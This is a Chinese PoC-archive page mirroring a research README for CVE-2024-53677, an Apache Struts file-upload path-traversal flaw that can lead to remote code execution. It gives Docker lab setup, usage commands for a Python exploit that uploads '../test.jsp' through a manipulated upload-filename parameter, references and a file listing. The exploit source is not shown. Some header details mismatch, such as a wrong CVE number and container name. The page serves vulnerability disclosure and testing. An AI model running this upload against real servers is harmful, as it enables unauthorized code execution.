关联漏洞
标题:
Apache Struts 安全漏洞
(CVE-2024-53677)
描述:Apache Struts是美国阿帕奇(Apache)基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 Apache Struts 2.0.0版本至6.4.0之前版本存在安全漏洞,该漏洞源于文件上传逻辑缺陷。
描述
Proof-of-Concept for CVE-2024-46538
介绍
This post is a research article published by [EQSTLab](https://github.com/EQSTLab).
# CVE-2024-53677
★ CVE-2024-53677 Unrestricted Upload of File with Dangerous Type and RCE PoC ★
## Lab Setup
```sh
cd docker
docker build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2023-50164 cve-2024-53677
```
## Timeline
**Dec 11** : CVE-2024-53677 File Upload PoC Uploaded
## Description
CVE-2024-53677 : File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. This issue affects Apache Struts: from 2.0.0 before 6.4.0. Users are recommended to upgrade to version 6.4.0 at least and migrate to the new file upload mechanism https://struts.apache.org/core-developers/file-upload . If you are not using an old file upload logic based on FileuploadInterceptor your application is safe. You can find more details in https://cwiki.apache.org/confluence/display/WW/S2-067.
## How to use
### Git clone
```
git clone https://github.com/EQSTLab/CVE-2024-53677.git
cd CVE-2024-53677
```
### Install packages
```sh
pip install -r requirements.txt
```
### Command
```sh
# Upload the default file
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName>
# Upload Specified File
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName> -f <File Path>
```
### Example
```sh
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp -f ./test.txt
```
### Output
**CVE-2024-53677.py**
### Result
# Disclaimer
This repository is not intended to be Object injection exploit to CVE-2024-53677. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.
# EQST Insight
We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.
https://www.skshieldus.com/eng/business/insight.do
# Reference
https://nvd.nist.gov/vuln/detail/CVE-2024-53677
https://y4tacker.github.io/2024/12/16/year/2024/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87-CVE-2024-53677-S2-067/
https://attackerkb.com/topics/YfjepZ70DS/cve-2024-53677
https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker
文件快照
[4.0K] /data/pocs/fa8b7d2753b2fe3a5df375234ec43f1c32c20580
├── [7.8K] CVE-2024-53677.py
├── [4.0K] docker
│ ├── [ 25K] catalina.sh
│ ├── [1.3K] context.xml
│ ├── [ 613] Dockerfile
│ ├── [4.0K] struts-app
│ │ ├── [8.9K] mvnw
│ │ ├── [5.7K] mvnw.cmd
│ │ ├── [3.7K] pom.xml
│ │ ├── [4.0K] src
│ │ │ └── [4.0K] main
│ │ │ ├── [4.0K] java
│ │ │ │ └── [4.0K] com
│ │ │ │ └── [4.0K] example
│ │ │ │ ├── [2.0K] UploadAction.java
│ │ │ │ └── [2.4K] UploadsAction.java
│ │ │ ├── [4.0K] resources
│ │ │ │ └── [ 675] struts.xml
│ │ │ └── [4.0K] webapp
│ │ │ ├── [ 167] file.jsp
│ │ │ ├── [ 307] files.jsp
│ │ │ ├── [ 362] index.jsp
│ │ │ └── [4.0K] WEB-INF
│ │ │ └── [1.4K] web.xml
│ │ └── [4.0K] target
│ │ └── [4.0K] classes
│ │ ├── [4.0K] com
│ │ │ └── [4.0K] example
│ │ │ ├── [1.3K] UploadAction.class
│ │ │ └── [1.7K] UploadsAction.class
│ │ └── [ 675] struts.xml
│ └── [ 219] tomcat-users.xml
├── [2.5K] README.md
├── [ 8] requirements.txt
└── [2.7K] test.txt
14 directories, 21 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。